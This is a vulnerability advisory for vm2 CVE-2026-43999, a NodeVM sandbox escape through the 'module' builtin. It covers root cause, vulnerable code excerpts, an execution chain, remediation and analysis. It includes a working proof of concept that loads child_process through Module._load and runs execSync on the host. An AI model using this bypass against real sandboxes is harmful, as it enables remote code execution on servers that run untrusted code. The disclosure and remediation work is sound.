vm2 CVE-2026-43999
CRITICALSeverity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Primary rating from Vendor (https://github.com/patriksimek/vm2).
CVSS VectorVendor: https://github.com/patriksimek/vm2
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Lifecycle Timeline
3Blast Radius
ecosystem impact- 11 npm packages depend on vm2 (1 direct, 10 indirect)
Ecosystem-wide dependent count for version 3.10.5.
DescriptionCVE.org
Summary
NodeVM's builtin allowlist can be bypassed when the module builtin is allowed (including via the '*' wildcard). The module builtin exposes Node's Module._load(), which loads any module by name directly in the host context, completely bypassing vm2's builtin restriction. This allows sandboxed code to load excluded builtins like child_process and achieve remote code execution.
Severity
Critical (CVSS 3.1: 9.9)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
- Attack Vector: Network - sandboxed code is typically received from external sources (user-submitted scripts, plugin code)
- Attack Complexity: Low - no special conditions required;
['*', '-child_process']is a common, documented pattern - Privileges Required: Low - attacker needs only the ability to submit code to the sandbox, which is the intended use case
- User Interaction: None
- Scope: Changed - escape from sandbox boundary to host system
- Confidentiality Impact: High - arbitrary command execution on the host
- Integrity Impact: High - arbitrary command execution on the host
- Availability Impact: High - arbitrary command execution on the host
Affected Component
lib/builtin.js-makeBuiltinsFromLegacyOptions()(lines 109-117) - includesmodulein'*'expansionlib/builtin.js-addDefaultBuiltin()(lines 86-90) - loadsmodulewith generic readonly wrapperlib/builtin.js-SPECIAL_MODULES(line 61) - does NOT includemodule
CWE
- CWE-863: Incorrect Authorization
Description
Root Cause: The module builtin provides unrestricted host module loading
When builtin: ['*', '-child_process'] is configured, makeBuiltinsFromLegacyOptions iterates over BUILTIN_MODULES and adds all modules not explicitly excluded:
// lib/builtin.js:40
const BUILTIN_MODULES = (nmod.builtinModules || Object.getOwnPropertyNames(process.binding('natives')))
.filter(s=>!s.startsWith('internal/'));
// lib/builtin.js:109-117
if (Array.isArray(builtins)) {
const def = builtins.indexOf('*') >= 0;
if (def) {
for (let i = 0; i < BUILTIN_MODULES.length; i++) {
const name = BUILTIN_MODULES[i];
if (builtins.indexOf(`-${name}`) === -1) {
addDefaultBuiltin(res, name, hostRequire);
}
}
}Node's builtinModules includes 'module' (verified: require('module').builtinModules.includes('module') → true). Since only '-child_process' is excluded, 'module' passes the filter and gets added.
The module builtin is NOT in SPECIAL_MODULES (which only covers events, buffer, util), so it gets the generic loader:
// lib/builtin.js:86-90
function addDefaultBuiltin(builtins, key, hostRequire) {
if (builtins.has(key)) return;
const special = SPECIAL_MODULES[key];
builtins.set(key, special ? special : vm => vm.readonly(hostRequire(key)));
}This wraps Node's Module class in a readonly proxy and hands it to the sandbox.
The readonly proxy does not prevent method calls
ReadOnlyHandler (bridge.js:940-983) only overrides mutation traps: set, setPrototypeOf, defineProperty, deleteProperty, isExtensible, preventExtensions. It does NOT override get or apply, which are inherited from BaseHandler.
BaseHandler.apply() (bridge.js:665-677) forwards function calls directly to the host context:
apply(target, context, args) {
const object = getHandlerObject(this);
let ret;
try {
context = otherFromThis(context);
args = otherFromThisArguments(args);
ret = otherReflectApply(object, context, args);
} catch (e) {
throw thisFromOtherForThrow(e);
}
return thisFromOther(ret);
}So Module._load('child_process') is forwarded to Node's native Module._load in the host context, which loads child_process without any vm2 allowlist check.
Inconsistent defense: some builtins are isolated, module is not
The codebase IS aware that certain builtins need special handling:
events: Gets a complete sandbox-native reimplementation vialib/events.jsbuffer: Custom loader that only exposes theBufferclassutil: Custom loader that replacesinheritswith a sandbox-safe version
But module - which provides access to the host's entire module loading infrastructure via Module._load, Module._resolveFilename, etc. - gets no special treatment at all.
Full execution chain
- Host configures
NodeVMwithbuiltin: ['*', '-child_process'] makeBuiltinsFromLegacyOptionsadds'module'to allowed builtins (not excluded)- Sandbox code calls
require('module')→ resolver finds'module'in builtins →loadBuiltinModule('module') - Loader calls
vm.readonly(hostRequire('module'))→ returns readonly proxy of Node'sModuleclass - Sandbox reads
Module._load→BaseHandler.get()returns proxied function - Sandbox calls
Module._load('child_process')→BaseHandler.apply()forwards to host - Host's
Module._loadloadschild_processnatively (no vm2 check involved) child_processmodule proxied back to sandbox- Sandbox calls
child_process.execSync('id')→ executes on host → RCE
Proof of Concept
const { NodeVM } = require('vm2');
// Developer thinks child_process is blocked
const vm = new NodeVM({
require: {
builtin: ['*', '-child_process'],
external: false,
},
});
const out = vm.run(`
const Module = require('module');
// Module._load bypasses vm2's builtin allowlist entirely
const cp = Module._load('child_process');
module.exports = cp.execSync('id').toString();
`, 'poc.js');
console.log(out.trim()); // prints host uid/gid - RCE achievedImpact
- Complete builtin allowlist bypass: Any configuration that allows the
modulebuiltin (including['*', '-X']patterns) can load ANY builtin, including explicitly excluded ones. - Remote code execution: Sandboxed code can execute arbitrary commands on the host via
child_process.execSync. - Common configuration affected: The
['*', '-child_process', '-fs']pattern is documented and widely used by developers who want "all builtins except dangerous ones." - No special conditions: Unlike environment-dependent attacks, this works on every Node.js version, every OS, and every vm2 deployment that uses the
'*'wildcard. - Additional attack surfaces via
module: Beyond_load, theModuleclass also exposes_resolveFilename,_cache,_pathCache, and other internals that could be abused.
Recommended Remediation
Option 1: Exclude module from BUILTIN_MODULES entirely (Preferred)
The module builtin provides unrestricted host module loading and should never be exposed to the sandbox:
// lib/builtin.js:40
const DANGEROUS_BUILTINS = new Set(['module', 'worker_threads', 'cluster']);
const BUILTIN_MODULES = (nmod.builtinModules || Object.getOwnPropertyNames(process.binding('natives')))
.filter(s => !s.startsWith('internal/') && !DANGEROUS_BUILTINS.has(s));This prevents module from being included even with the '*' wildcard. Consider also blocking worker_threads and cluster which can spawn processes.
Option 2: Add module to SPECIAL_MODULES with a safe wrapper
If module must be accessible, provide a sandbox-safe version that only exposes safe APIs:
// lib/builtin.js
const SPECIAL_MODULES = {
events: { /* ... existing ... */ },
buffer: defaultBuiltinLoaderBuffer,
util: defaultBuiltinLoaderUtil,
module: function defaultBuiltinLoaderModule(vm) {
// Only expose safe, read-only metadata - no _load, no _resolveFilename
return vm.readonly({
builtinModules: [...nmod.builtinModules],
// Omit _load, _resolveFilename, _cache, createRequire, etc.
});
}
};Tradeoff: Breaks sandbox code that legitimately uses Module APIs, but those APIs are inherently unsafe in a sandbox context.
Credit
This vulnerability was discovered and reported by bugbunny.ai.
AnalysisAI
vm2's NodeVM sandbox escape allows remote code execution when applications use the common builtin: ['*', '-child_process'] configuration pattern. An attacker with the ability to submit code to the sandbox can bypass the builtin allowlist by requiring the module builtin, then using Module._load() to load explicitly excluded modules like child_process in the host context. This directly leads to arbitrary command execution on the host system. The vulnerability affects vm2 version 3.10.5, with a vendor-released patch available in version 3.11.0. CVSS score of 9.9 reflects critical severity with network attack vector, low complexity, and scope change from sandbox to host. No public exploit code or active exploitation evidence identified at time of analysis.
Technical ContextAI
vm2 is a Node.js sandbox library that isolates untrusted JavaScript code by wrapping Node's built-in modules with proxy handlers. The vulnerability stems from incorrect authorization (CWE-863) in lib/builtin.js where the module builtin-which exposes Node's native Module._load() function-receives only a generic ReadOnlyHandler wrapper instead of the specialized isolation applied to other sensitive builtins like events, buffer, and util. The ReadOnlyHandler prevents property mutation but inherits BaseHandler.apply() which directly forwards function calls to the host context without vm2 allowlist validation. When developers use the documented pattern builtin: ['*', '-child_process'] to allow all builtins except dangerous ones, the wildcard expansion includes module because it's not in the SPECIAL_MODULES exclusion list. Sandboxed code can then call Module._load('child_process') which executes in the host context, completely bypassing vm2's security boundary. The CPE identifier pkg:npm/vm2 confirms this affects the npm package ecosystem. The CVSS vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C indicates network-accessible attack with low complexity, low privileges (just the ability to submit code to the sandbox), no user interaction, and critically, a scope change representing the sandbox escape.
RemediationAI
Immediately upgrade to vm2 version 3.11.0, which excludes the module builtin from wildcard expansion and prevents this sandbox escape. The upgrade path from 3.10.5 to 3.11.0 is documented in the GitHub advisory at https://github.com/patriksimek/vm2/security/advisories/GHSA-947f-4v7f-x2v8 and is available via npm update. If immediate patching is not feasible, implement the following compensating control: explicitly exclude the module builtin by changing configurations from builtin: ['*', '-child_process'] to builtin: ['*', '-child_process', '-module']. This workaround prevents attackers from accessing Module._load() but may break legitimate sandbox code that uses the module API for introspection. Test thoroughly as this changes the sandbox API surface. For defense in depth, run vm2 sandboxes in containers with restricted capabilities (no CAP_SYS_ADMIN), use seccomp filters to block dangerous syscalls, and implement resource limits via cgroups. Note that these OS-level controls do not prevent the sandbox escape itself but limit post-exploitation impact. Organizations should audit all vm2 usage to identify affected configurations and prioritize patching instances that process untrusted code from external users.
FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t
Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete
Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner
Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin
The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic
Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat
The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se
Same weakness CWE-863 – Incorrect Authorization
View allSame technique Authentication Bypass
View allVendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-947f-4v7f-x2v8